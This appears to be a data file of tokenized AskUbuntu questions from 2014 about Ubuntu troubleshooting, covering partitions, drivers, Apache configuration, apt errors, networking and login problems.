491553	problem with partitions	i am using ubuntu 14.04 . whenever i open gparted , i get a libparted bug found error : error informing the kernel about modifications to partition /dev/sda2 -- device or resource busy . this means linux wo n't know about any changes you made to /dev/sda2 until you reboot -- so you should n't mount it or use it in any way before rebooting . when i press ignore button , the following window opens : but when i press cancel , i get : failed to add partition 2 ( device or resource busy ) i also tried fdisk -l and got an problem there : prateek @ prateek-lenovo-g500 : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xd9fa2484 device boot start end blocks id system /dev/sda1 * 2048 2050047 1024000 b w95 fat32 /dev/sda2 2050055 976773119 487361532+ f w95 ext 'd ( lba ) partition 2 does not start on physical sector boundary . /dev/sda5 2050056 415619071 206784508 7 hpfs/ntfs/exfat /dev/sda6 415621120 498724863 41551872 83 linux /dev/sda7 498726912 968169471 234721280 7 hpfs/ntfs/exfat /dev/sda8 968171520 976773119 4300800 82 linux swap / solaris i am stuck here and i have no idea how to solve this problem . can anybody help me ?
491556	suphp : php 403 errordocument in apache wo n't work	i am trying to set up an 403 error document in apache , using a php file , like this ( via .htaccess ) : order deny , allow deny from all allow from [ my_ip ] errordocument 403 /err403.php but it does n't works , it shows the apache default 403 error , but if i use a .html errordocument it works , like this : order deny , allow deny from all allow from [ my_ip ] errordocument 403 /err403.html then it shows the customized html document with the error page . i am using suphp . and the apache and php in ubuntu 14.04 server repositories . if i remove this restriction from the .htaccess , the file err403.php could be read normally . any ideas ? ? thanks ! ! edit : ie. , changing the allow from ip to another ip so that it triggers the error .
491562	how to know which version of the compiler used to install a program from source among all versions of the that compiler	i installed a program via source code . to do that i downloaded a gcc and g++ appropriate for that . i use this command in order to install that $ export cc=gcc- ? ? cxx=g++- ? ? & & ./install ? ? =i do not remember now i forget the version of those . is there any way to know that ?
491568	how do i get nvidia drivers to work on xubuntu 14.04 ?	i installed and tested multiple nvidia drivers such as 331 and 304 but every time i always end with xubuntu on a black screen after the booting screen . how do i make them work successfully on my 2010 15 inch macbook pro ?
491572	why the suspend is not even close to consuming 0 power ?	out of curiosity , i 've measured power consumption of my computer on various states/loads . and guess what , suspend is not that energy saving as you may guess ! it 's far from claimed 0 or nearly 0 power consumption in d3 state . on suspend , my computer uses 16w , turned off 2w , while turned on 39w . i have noticed suspend in my laptop works really well , staying on battery easily over one day . why is it not the case with the pc ? ie . 1c load = 1 core load generated by stress -c 1 -t 60 hardware config : msi z87-g41 i7-4770k ( turbo enabled ) 2x8gb ram hyperx xpm beast ssd 120gb hyperx 3k + hdd 3tb seagate ocz 500w corexstream sli
491573	error while installing windows 8 along xubuntu on uefi	i was installing installing xubuntu when i accidentally deleted my pre-installed windows 8 . to reinstall windows 8 i changed the boot mode to csm ( as windows doesnt show up in efi menu ) . on clicking install , it says `` no device drivers were found . make sure that the installation media contains the correct drivers , and then click ok '' . how do i fix this ? ps : i am on toshiba satellite c850-b559 edit : the other question does not address the driver error but i want a fix for that error and not an installation guide .
491574	ebook managing tool	i 'm searching for ebook managing tool that make possible to search text in all ebooks in specified directory . it would be nice if this tool will have gui . something like banshee for mp3 files .
491576	touchpad emulate right click and hold with 3 fingers	i have a firefox plug-in called `` all-in-one gestures '' i have a new lenovo laptop with etps/2 elantech touchpad and no mouse . what i would like to achieve is the following : when i move three fingers over the touchpad , i would like to emulate mouse movement with right click pressed .
491579	trouble with tl-wn821nv3 wifi dongle and qbittorrent	alright , so i 'm having this very odd problem , i 've tried everything i know and just ca n't seem to figure out whats causing it . i 'm on xubuntu 14.04 . randomly my usb wifi dongle will , for lack of a better word , `` hang '' . the flashing led on it goes stable , network manager reports that i 'm still connected to the internet , but i am unable to load webpages . oddly however is that whenever this occurs , qbittorrent freezes as well and refuses to respond to any clicks or input . as soon as i unplug my dongle , qbittorrent immediately unfreezes like there never was a problem . upon replugging the dongle it connects flawlessly to my network . i noticed this issue started just a little bit after i installed qbittorent , i 'm using qbittorent 3.1.9.2 direct from the ppa , i tried downgrading to 3.1.8 from the official repo but to no avail . iwonfig output wlan0 ieee 802.11bgn essid : '' tp-link '' mode : managed frequency:2.437 ghz access point : 00:1d:0f : f8:7b:12 bit rate=54 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=58/70 signal level=-52 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:7 invalid misc:132 missed beacon:0 sudo lshw -c network output *-network description : ethernet interface product : 82579v gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 05 serial : 38:60:77:9c : e5:13 capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k firmware=0.13-4 latency=0 link=no multicast=yes port=twisted pair resources : irq:42 memory : fe400000-fe41ffff memory : fe428000-fe428fff ioport : f080 ( size=32 ) *-network description : wireless interface physical id : 1 bus info : usb @ 1:1.2 logical name : wlan0 serial : f8 : d1:11:09 : d2:3b capabilities : ethernet physical wireless configuration : broadcast=yes driver=ath9k_htc driverversion=3.13.0-30-generic firmware=1.3 ip=192.168.2.102 link=yes multicast=yes wireless=ieee 802.11bgn lsusb bus 001 device 006 : id 0cf3:7015 atheros communications , inc. tp-link tl-wn821n v3 802.11n [ atheros ar7010+ar9287 ] also when my dongle is in this hanged state , and attempt at ping or inputting command iwconfig will result in the output never coming , seemingly taking forever , as soon as the dongle is unplugged however , the output to these commands suddenly appears .
491580	how to write a script to run different application	i am very new to linux platform . looking for a script file to call different application start up file located in different location and needs to be run in different terminals . for example : i have two .sh file like a.sh and b.sh in different locations . now need a script file to run these .sh file . when i run that script it should be open two terminals . in the first terminal a.sh should be called and b.sh file should be run on second terminal . thanks in advance for help . regards , raghu
491583	how to make canon lbp 6000 printer work on ubuntu 14.04 ?	how can i make my printer ( canon lbp 6000 ) work on ubuntu 14.04 ? should i seek help from a programmer ?
491589	going from 2 partitions to one	i have partitions set up as in this image : i would like /dev/sda2 and /dev/sda3 to be merged together , e.g . all the contents of my /home directory on /dev/sda3 get moved onto /dev/sda2 , so that /dev/sda3 becomes free space on my hard drive i do n't want to reinstall ubuntu ! are there any options without reinstalling ?
491590	need help downloading steam !	i 'm new to ubuntu , i have 14.04 and i 've downloaded the steam from the usc that says `` the ultimate gaming platform '' and it just wo n't open or respond . i tried downloading the one that says `` application for managing and playing games on steam '' but it says `` there isn’t a software package called “steam” in your current software sources . '' i ; mreallt confused i would really appreciate any help !
491592	usb hdd cache problem ?	i have an adata sh14 500gb external hdd . when i connect it to the ubuntu server , i have the following error : sd 7:0:0:0 : [ sdb ] no caching mode page found sd 7:0:0:0 : [ sdb ] assuming drive cache : write through i think it is normal , and it 's not an error , just a warning . but yesterday i bought another , but the same , hdd , and it is n't have the error . so i think it is n't normal . what do you think ?
491593	how to fix this spotify error ?	i have xubuntu 64 bit 14.04 , latest version of spotify and it seems to be working fine , but i see this error . i tried sudo apt-get update sudo apt-get upgrade sudo apt-get clean sudo apt-get autoclean sudo apt-get autoremove sudo dpkg -- configure -a sudo apt-get install -f but that do no fix it , i keep seeing reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened .
491595	how can i view all the folders currently mounted through sshfs ?	i mounted several folders through sshfs and i lost track of them . can anyone guide me how do i list all the folders that are currently mounted using sshfs ?
491598	14.04 lts login failure on virtualbox	i can not login to ubuntu 14.04 lts . i just set my java_home . then i restarted my ubuntu which is on oracle vm virtualbox manager . when i typed wrong password , it gives me error . but when i typed correct password , screen gets black for a second then it loads login screen again . it 's newly installed , like 2-3 days ago . it 's running on mac os x 10.9.3 how can i fix this ? only solution i can think of it is setting it to log on without login procedure but i think it might not be problem specific for login screen .
491602	ubuntu live cd customization with automated install	i am trying to customize an installation cd for ubuntu 12.04 but i 'm having some issues . i 've used ubuntu builder and ubuntu customization kit ( uck ) and successfully updated packages and added packages to the cd/dvd itself , but i can not find a way to automate the install with the live cd . i 've looked into using the alternative cd , but neither of the above programs will load it as they are looking for the live cd architecture . from the documentation for alternative cd customization , it looks like i can specify packages to be downloaded during install , but i would like to have them included in the cd/dvd in case the user does n't have internet access and also it would lead to a faster install . i 've tried to add a preseed file to the livecd , but the installer does n't seem to take it . could this be user error , or does the live cd installer reject a preseed file ? i added a preseed file to /cdrom/preseed/preseed.cfg ( same area as ubuntu.seed ) and used the following in the /isolinux/txt.cfg file : default live-install label live menu label ^try ubuntu without installing kernel /casper/vmlinuz append file=/cdrom/preseed/ubuntu.seed preseed/file=/cdrom/preseed/preseed.cfg boot=casper initrd=/casper/initrd.lz quiet splash -- label live-install menu label ^install ubuntu kernel /casper/vmlinuz append file=/cdrom/preseed/ubuntu.seed preseed/file=/cdrom/preseed/preseed.cfg boot=casper only-ubiquity initrd=/casper/initrd.lz quiet splash -- i 've also tried editing the ubuntu.seed file to add some information to it , it seems to take some of the info ( location and some user info , but not the password ) , but it still requires the user to go through the install screens . preferably i would like to have the user boot up the cd , click the 'install ubuntu ' button , and have the preseed file fill in the questions ( location , user info , partitioning , etc . ) without having to click through them . i would also like to either edit the text below the try or install buttons to warn of an automated install that will wipe the system , or better yet , have a popup that warns the user of loss of data . is this possible , or can i use the alternative cd and add packages to the installation disk to have an offline install ?
491603	package list error , can not open software updater or package list	i am getting an error in the title bar above e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . i have removed spotify , still the error persists . i can not access software updater or package manager . i use ubuntu 14.04 on 64-bit laptop . i am new to ubuntu , please help .
491604	grub rescue - > no such partition	i have a big problemm with my computer ... i have reduced the windows partition and when i reboot then i have the grub rescue with the error message : no such partition . moreover , i do n't have access to the bios and so it seems impossible to change the boot sequence to boot on my live usb or live cd . the command line ls gives me : ( hd0 ) ( hd0,1 ) ( hd0,2 ) ( hd0,3 ) i have a recovery windows partition ( 1 i think ) , a windows partition and a linux partition . yet , the command lines ls ( hd0,1 ) , ls ( hd0,2 ) and ( hd0,3 ) gives me the error message : unknown filesystem and so i ca n't set a boot anymore . do you have any idea ? br , yannick
491605	visiontek modem in ubuntu 14.04	within a few days my broadband connection will be cut.then the only way i can connect is to use a usb modem ( visiontek 82gh hsupa ) .the problem is i can not use the modem in an ordinary account and has to login using a root account to use it.so is there some way to use an ordinary account to use the modem.using gksudo or sudo does'nt help.please this is urgent.thanks in advance.i am using ubuntu 14.04 . please suggest some way to get temporary root rights or something else . for those who do'nt know how visiontek works , i will try to explain it the best i can . in windows visiontek can be run by just inserting it and then installing a program.but in linux its more complicated.you have to copy a folder from the modem to the usr folder.and in that you should first run the install script and dialup script both with root rights , all while inserting the modem.when i run the dialup script in an ordinary acount it says the usb modem is not ejected even when it is while in the root account it runs okay ( you have to eject the modem before dialup for it to work.this will open the built-in memory card reader . )
491606	14.04 random hanging on boot	i 've already googled a lot and probably know what 's wrong but do n't know how to fix it . fresh install of trusty tahr lts i386 on a new netbook with an intel n2820 bay trail graphics . average 4 of 5 boots hang up when it tries to change the screen resolution and must be turned off by the power button . then it boots normally and everything is fine , graphics is accelerated . bad : `` hidden '' grub for 3 seconds , `` starting up '' in a low-res , usually a black screen for a second and then `` starting up '' in a low-res forever . good : the same , `` starting up '' in a low-res changes to high-res 1366x768 , then more lines roll down and then the purple screen appears and then login screen . i tried to play with /etc/default/grub options and it worked until i reinstalled the grub package and installed grub at /dev/sda . now it seems that /etc/default/grub is completely ignored ( sudo update-grub processed each time ) . i tried various tips ( removed `` quiet splash '' , added `` acpi off '' , `` console terminal '' ) but it 's still the same . note : recovery mode hangs too . it also does n't halt/reboot - ( this is the last line displayed ) and the power button must be used but this is just a background - not a big problem for me . any help appreciated !
491608	disk error when installing windows 7	i bought a new laptop , a hp pavilion 15n-233tu . it had an ubuntu 12.04 os . when i was installing windows 7 it showed 2 partitions . one was labeled hp_tools so i left that one untouched , the other one i formatted and installed windows 7 on . but i ca n't find drivers for it , so i used system restore and installed ubuntu again . i also tried installing windows 8 , but that gives an error : windows can not be installed because partition is not in ntfs type so right now i am using ubuntu and i used a disk utility to change its format , but it gives some mounted error . how can i solve this ?
491609	deploy ubuntu with maas fails	i have a problem with the ubuntu deploying with maas . i 'm trying to install ubuntu on a kvm virtual machine . the boot with pxe works , i see the login prompt during the deploying , the server connect the repository and get the messages success . but if i start the vm there is no data on the vm hard disk . does someone know this problem and have an idea what 's wrong ? greets schlussbilanz
491612	natulius `` connect to server ''	i used to manage the remote servers connection with the bookmarks options . since 14.04 the connections i used is saved in a popup window - how do i edit them ? also - if there is a better way of connection to remote servers please tell me . i tried using eclipse remote system explorer and other software from the software center and it 's not quite right ... i miss winscp : ( ( it 's the only thing i miss from windows , though ) , also , i prefer not to use wine . any help will be appreciated
491614	beginner installing rpm package	on latest version ubuntu 14.04 lts , i have tried this : sudo apt-get install yum then it says : sudo password for user and nothing gon na happen , if hit enter 3 times it says 3x incorrect attempt . i 'm beginner to linux
491615	best practice for sharing data between users	i 'm new to ubuntu and i 've partitioned disk as follows / 100g swap 30g -- i need to run virtuals /home 500g and that structure after searching the problem i face is where to put files for all users
491618	ca n't set correct time	i 'm not able to set the correct time on my ubuntu 14.04 system . it is always nine minutes behind the correct time and makes me being chronically late . approaches that failed : ntpdate sudo service ntp stop sudo ntpdate -s 0.de.pool.ntp.org the command seems to be executed correctly . no change in time offset though . ntpd sudo service ntp restart sudo service ntp stop sudo ntpd -q -g -x -n restart successful , correct time servers checked in /etc/ntp.conf . no success . the command in the third line remains unresponsive . hwclock sudo hwclock -- set -- date= '' 2014-07-04 11:22:00 '' date fri jul 4 11:14:59 cest 2014 executes flawlessly . no change . my question is related to system time off by a small amount but there is no solution given .
491620	`` problem with mergelist /var/lib/apt/lists/repository.spotify.com '' while updating the list	everything was working fine just yesterday . today i wanted to update and it failed with the following error : pakketlijsten worden ingelezen ... fout ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en e : de pakketlijsten of het statusbestand konden of niet ontleed , of niet geopend worden . i got dutch localisation , so i 'll try to transate here.. ( hopefully it makes sense.. ) first line : reading package list ... error ! last line : the packagelist or the status file could n't be parsed or opened . does someone know what happened and how i can correct this issue ?
491624	setresuid operation not permitted when calling via php	i 've got following problem : my apache and php script are running as user www-data . i want to call a script that can only be executed as root , so i added a new file to /etc/sudoers.d to allow this command for the www-data user : echo390 : /var/www/html # cat /etc/sudoers.d/iptables www-data all= nopasswd : /sbin/iptables my php script looks as follows : < ? php $ command = ' '' /usr/bin/sudo '' `` /sbin/iptables '' -l -v -n | grep `` 220.177.198.43 '' ' ; echo 'benutzer : '.exec ( 'whoami ' ) . ' < br/ > ' ; echo 'command : '. $ command . ' < br/ > ' ; $ result = array ( ) ; exec ( $ command , $ result ) ; print_r ( $ result ) ; ? > if i call the script from the command line via : sudo -u www-data /usr/bin/php test.php everything runs as expected , but when i call the script via apache , i got the following error in apache2/error.log : sudo : perm_root : setresuid ( 0 , -1 , -1 ) : operation not permitted i 've upgraded ubuntu from 12.02 to 14.04 the same script had run in ubuntu 12.02 without any problems . can anybody help me ? where is the error here ? groups for www-data : echo390 : ~ $ groups www-data shows www-data : www-data as info : i use the apache-mpm-itk module sothat every apache virtual host runs under a separate user id . so how do you allow a specific apache user to execute a specific shell script with root privileges ( in php etc ) ? thanks in advance and kind regards ravermeister
491625	is this cinnamon panel item also available in xfce ? ( or alternative )	i 'm still wondering which distro to use . so far i 've tried linux mint 17 and i liked that , but now i 'm onto xubuntu . in mint ( with cinnamon ) there was a really nifty ( and popular ) panel item called : window list with app grouping it sort of resembles the ms windows 7 taskbar ( as i left that for linux : ) ) , which makes my taskbar less cluttering when i have âą1000 things opened . the main things i like about it : grouping windows middle-mouse-button opens new window/instance of program mouse-over shows windows is there anything for xfce that does the same ?
491626	surround sound on ubuntu 14.04 with logitech g430 ?	i have a logitech g430 headset , that comes with 7.1 surround sound . on windows 7 , i have the logitech gaming software installed , which allows me to have surround sound on my headset . i was wondering whether there was a ubuntu method to allow me to get surround sound on my headset , becuase the methods i have tried have n't worked = ( any tips ?
491629	how to install php mbstring extension in ubuntu ?	what is php mbstring extension . what is the perfect way to install this extension on ubuntu 14 . thanks regards , rohit
491638	mount points & installation	i 've two hdd one of 160gb and another of 1tb.i want to install ubuntu 13.10 in 160gb hdd and create two saparte partition of 500mb each . i want to know how is this possible and what should be the mount points for all of them as hdd space is unallocated .
491644	trying to access windows 8 computer asks for password 14.04 lts	i have installed samba share on ubuntu 14.04 lts - i can see my windows machine via 'browse network ' but when i double click the icon it asks me to verify my username , workgroup and password . the workgroup is 'workgroup' the username and password i have tried every combination possible , this includes my windows and ubuntu logins with no luck it just keeps displaying the same login box . when i do a net config on my windows 8 machine it says that my username is : davidxxxxxx @ gmail.com ( as windows 8 logs on via my microsoft account ) what am i doing wrong ? update : i turned off 'password-protected sharing ' from the advanced sharing settings section of the windows 8 control panel . then upon accessing the network from ubuntu i can see the workgroup and then the computer . when i now go into the computer i can see a folder for public which shows all the files included in the public folders on windows 8 , which is fine . but , the files i actually want to use on my ubuntu are inside non-public folders . so i have a music folder , i right click on that and choose 'properties ' then i click the 'sharing ' tab , then 'advanced sharing ' . i then check the 'share this folder ' box and click 'permissions ' , i then choose 'allow ' on full control , change and read and apply . when i then try to access this from ubuntu i get the error : - unable to access location : failed to mount windows share - permission denied . so i am on the right track and it does work , there just seems to be a permission issue somewhere . ps i 've tried turning off firewalls , etc with no luck .
491645	system frequently hangs and lagging response	i am using ubuntu 14.04 . did the upgrade few months ago . my system was working normally until yesterday it started lagging . the system frequently hangs for 30 seconds ( approx or more than that ) , and there is lagging response as i type . other than that system is working normal . i googled for this and found this answer : http : //askubuntu.com/a/21643/55026 . third point helped me and i am getting these messages from kern.log jul 4 16:11:40 moony kernel : [ 24200.058787 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen jul 4 16:11:40 moony kernel : [ 24200.058792 ] ata1.00 : failed command : flush cache ext jul 4 16:11:40 moony kernel : [ 24200.058796 ] ata1.00 : cmd ea/00:00:00:00:00/00:00:00:00:00/a0 tag 0 jul 4 16:11:40 moony kernel : [ 24200.058796 ] res 40/00:00:00:4f : c2/00:00:00:00:00/00 emask 0x4 ( timeout ) jul 4 16:11:40 moony kernel : [ 24200.058797 ] ata1.00 : status : { drdy } jul 4 16:11:40 moony kernel : [ 24200.058801 ] ata1 : hard resetting link jul 4 16:11:45 moony kernel : [ 24205.432930 ] ata1 : link is slow to respond , please be patient ( ready=0 ) jul 4 16:11:45 moony kernel : [ 24205.488995 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) jul 4 16:11:45 moony kernel : [ 24205.490405 ] ata1.00 : configured for udma/100 jul 4 16:11:45 moony kernel : [ 24205.490412 ] ata1.00 : retrying flush 0xea emask 0x4 jul 4 16:11:45 moony kernel : [ 24205.504962 ] ata1.00 : device reported invalid chs sector 0 jul 4 16:11:45 moony kernel : [ 24205.504981 ] ata1 : eh complete system details : hdd - 500gb toshiba mk5076gs ram - 4gb ddr3 in two slots cpu - intel ( r ) core ( tm ) i5-3210m cpu @ 2.50ghz display - 3rd gen core processor graphics controller laptop - hp 2116tu i have googled the error messages and they say that it might be some hard disk problem . update : system used to hang while copying large file ( movies , etc . ) to system . but i used to ignore them .
491646	how do i find dns servers in use by my xubuntu 14.04 server ?	i have a xubuntu server 14.04 x64 . how do i list all dns servers that are in use without networkmanager which is not even installed ?
491647	can not log-in ( ubuntu 14.04 )	i suddenly encountered the said issue just this afternoon . i 've been able to login on my machine even if i were n't connected to our network . but all of a sudden , ubuntu does not want to accept my login credentials . this machine is dual boot , and my login credentials are the same for both ubuntu and windows . i tried logging in to windows and it worked . but with ubuntu , it fails . i tried logging in with a different account , and tried adding myself to the list of users . i canceled it cause i saw that my user directory still exists . it just seems like i 've been removed from the list of users . this may not be relevant but i checked the following files : visudo my username is still there /etc/passwd i 'm not in this list . i did n't check before if it were . i even tried going to the terminal side of logging in , and even there i did n't manage to get through . it 's like all of a sudden , my user credentials disappeared from ubuntu 's memory . i 've tried the following : copy the .iceauthority ( in others this might be .xauthority ? ) file from one user to my home folder , changed its permissions , but still nothing happens . any insight on how to solve this one ? regards update @ steeldriver : i did what you asked and here 's what happened ( replaced 'username ' with my username ) : $ getent passwd username $ $ ls -ld /home/username drwx -- -- -- 35 1870676233 1870676233 4096 jul 4 17:54 /home/username
491648	upgrade failed for the ubuntu 14.04	i upgrade ubuntu from 13.04 to 14.04 , and my notebook now does not accept the upgrade and keep getting this message : the system running in low - graphics mode.your screen , graphics card , and input device settings could not be detected correctly.you will need to configure these yourself and when i click ok it takes me into a white board and can not write anything.my question is , what can i do to return back to 13.04 version ?
491649	i ca n't get my usb modem to work ( huawei , 14.04 )	i am new to ubuntu - i just installed it yesterday and i have been having some problems . i would very much like to use my usb mobile broadband modem to gain access to the internet so i can do things like download wine and run steam.i know the modem is working because i am using right now in windows 8 . but i simply can not get it to work.i went to the connections manager and had some trouble but to no avail.i also tried to launch the built in .exe ( which i know does n't work on ubuntu . ) i searched for something that is the ubuntu version of a .exe but could n't find anything.i downloaded wine on windows and tried to open it in ubuntu but still could n't get it right . i think that if i could get my internet to work i could download it from the software centre and then hopefully have more success . i could also access the internet to search for solutions without having to restart my computer.i have searched for some time now for something to do but came up with nothing so if there is another thread that deals with the problem sorry . i have the latest ubuntu ( 14.04 lts ) . the modem is [ by ] huawei , and the service provider is 8ta . thanks in advance .
491651	firefox says server not found on ubuntu but not in windows	i 'm newbie to ubuntu and i 'm using ubuntu 14.04 ( dual booted with windows 7 ) . last few days it was working fine but from today my problem as follow as , firefox not working in ubuntu note : i had firefox only . not anymore chrome etc ... its says only , server not found but i do n't see any network connecting problem in windows 7 note : 1. using ethernet . 2 . no proxey . 3 . manual method . 4 . ipv4 settings . 5 . wired connection . update : ip - > 198.168.20.93 netmask - > 255.255.255.0 gateway - > 198.168.20.14 dnsserver - > 198.168.20.14 how can i resolve my internet issue ? update 1 : ubuntu @ p3-sd1 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1c : c0:80:19 : d3 inet addr:198.168.20.93 bcast:198.168.20.255 mask:255.255.255.0 inet6 addr : fe80 : :21c : c0ff : fe80:19d3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:157600 errors:1865 dropped:2455 overruns:0 frame:1865 tx packets:6437 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:12506428 ( 12.5 mb ) tx bytes:349342 ( 349.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:11260 errors:0 dropped:0 overruns:0 frame:0 tx packets:11260 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:897196 ( 897.1 kb ) tx bytes:897196 ( 897.1 kb ) ubuntu @ p3-sd1 : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 198.168.20.14 0.0.0.0 ug 0 0 0 eth0 198.168.20.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 ubuntu @ p3-sd1 : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 ubuntu @ p3-sd1 : ~ $ ping www.google.com ping : unknown host www.google.com update 2 : ubuntu @ p3-sd1 : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback
491652	usb-boot problem hp dv7	portable ubuntu installed on usb . ( not live ) my pc is hp pavillion dv7-uefi boots from livedvd & liveusb ok boots fuduntu installed usb ok ( not live real install ) bios sequence set to : 1-usb flash-usb hdd 2-cd dvd 3-hdd pf9 is one time boot list : durig boot plugged usb hdd and flash drive blinks i see usb device in boot list as samsuns for usb hdd and sandisk exreme for flash drive i install using livedvd or liveusb both ok . i install ubuntu 14.04 on usb hdd succesfully . ( samsung 250gb ) i install ubuntu 14.04 on usb 32gb sandisk exreme succesfully . in all cases internal hdd unplugged . i restart after install blinking cursor on line 2 on screen have to press and hold power-on key for poweroff i tested installed flash drive which is not booting on my pc , using samsung n150 32bit netbook boots ok ( i have photos taken using mobile phones ) all possible install selections tested . questions : am i missing a point or hp produced a pc ( $ 1500 ) which is not bootig while netpc does
491654	localhost/cgi-bin is not working	i an novice to run ubantu . in ubuntu 12.10 , localhost/cgi-bin/hello.py is working but localhost/cgi-bin is not working and it shows forbidden error , you dont have permission to access /cgi-bin/ on this server.i had made changes in /etc/apache2/sites-enabled/000-default serveradmin webmaster @ localhost documentroot /var/www/cgi-bin < directory / > options followsymlinks allowoverride all options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all scriptalias /cgi-bin/ /var/www/cgi-bin/ < directory `` /var/www/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all addhandler cgi-script .cgi .py addhandler default-handler .html .htm < /directory > options all errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined also changed /etc/apache2/sites-enabled/default-ssl serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride all < directory /var/www/cgi-bin > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /var/www/cgi-bin/ < directory `` /var/www/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all addhandler cgi-script .py .cgi addhandler default-handler .html .htm < /directory > options all errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /ssl_access.log combined # ssl engine switch : # enable/disable ssl for this virtual host . sslengine on # a self-signed ( snakeoil ) certificate can be created by installing # the ssl-cert package . see # /usr/share/doc/apache2.2-common/readme.debian.gz for more info . # if both key and certificate are stored in the same file , only the # sslcertificatefile directive is needed . sslcertificatefile /etc/ssl/certs/ssl-cert-snakeoil.pem sslcertificatekeyfile /etc/ssl/private/ssl-cert-snakeoil.key # server certificate chain : # point sslcertificatechainfile at a file containing the # concatenation of pem encoded ca certificates which form the # certificate chain for the server certificate . alternatively # the referenced file can be the same as sslcertificatefile # when the ca certificates are directly appended to the server # certificate for convinience . # sslcertificatechainfile /etc/apache2/ssl.crt/server-ca.crt # certificate authority ( ca ) : # set the ca certificate verification path where to find ca # certificates for client authentication or alternatively one # huge file containing all of them ( file must be pem encoded ) # note : inside sslcacertificatepath you need hash symlinks # to point to the certificate files . use the provided # makefile to update the hash symlinks after changes . # sslcacertificatepath /etc/ssl/certs/ # sslcacertificatefile /etc/apache2/ssl.crt/ca-bundle.crt # certificate revocation lists ( crl ) : # set the ca revocation path where to find ca crls for client # authentication or alternatively one huge file containing all # of them ( file must be pem encoded ) # note : inside sslcarevocationpath you need hash symlinks # to point to the certificate files . use the provided # makefile to update the hash symlinks after changes . # sslcarevocationpath /etc/apache2/ssl.crl/ # sslcarevocationfile /etc/apache2/ssl.crl/ca-bundle.crl # client authentication ( type ) : # client certificate verification type and depth . types are # none , optional , require and optional_no_ca . depth is a # number which specifies how deeply to verify the certificate # issuer chain before deciding the certificate is not valid . # sslverifyclient require # sslverifydepth 10 # access control : # with sslrequire you can do per-directory access control based # on arbitrary complex boolean expressions containing server # variable checks and other lookup directives . the syntax is a # mixture between c and perl . see the mod_ssl documentation # for more details . # < location / > # sslrequire ( % { ssl_cipher } ! ~ m/^ ( exp|null ) / \ # and % { ssl_client_s_dn_o } eq `` snake oil , ltd. '' \ # and % { ssl_client_s_dn_ou } in { `` staff '' , `` ca '' , `` dev '' } \ # and % { time_wday } > = 1 and % { time_wday } < = 5 \ # and % { time_hour } > = 8 and % { time_hour } < = 20 ) \ # or % { remote_addr } =~ m/^192\.76\.162\ . [ 0-9 ] + $ / # < /location > # ssl engine options : # set various options for the ssl engine . # o fakebasicauth : # translate the client x.509 into a basic authorisation . this means that # the standard auth/dbmauth methods can be used for access control . the # user name is the `one line ' version of the client 's x.509 certificate . # note that no password is obtained from the user . every entry in the user # file needs this password : `xxj31zmtzzkva ' . # o exportcertdata : # this exports two additional environment variables : ssl_client_cert and # ssl_server_cert . these contain the pem-encoded certificates of the # server ( always existing ) and the client ( only existing when client # authentication is used ) . this can be used to import the certificates # into cgi scripts . # o stdenvvars : # this exports the standard ssl/tls related `ssl_* ' environment variables . # per default this exportation is switched off for performance reasons , # because the extraction step is an expensive operation and is usually # useless for serving static content . so one usually enables the # exportation for cgi and ssi requests only . # o strictrequire : # this denies access when `` sslrequiressl '' or `` sslrequire '' applied even # under a `` satisfy any '' situation , i.e . when it applies access is denied # and no other module can change it . # o optrenegotiate : # this enables optimized ssl connection renegotiation handling when ssl # directives are used in per-directory context . # ssloptions +fakebasicauth +exportcertdata +strictrequire ssloptions +stdenvvars ssloptions +stdenvvars # ssl protocol adjustments : # the safe and default but still ssl/tls standard compliant shutdown # approach is that mod_ssl sends the close notify alert but does n't wait for # the 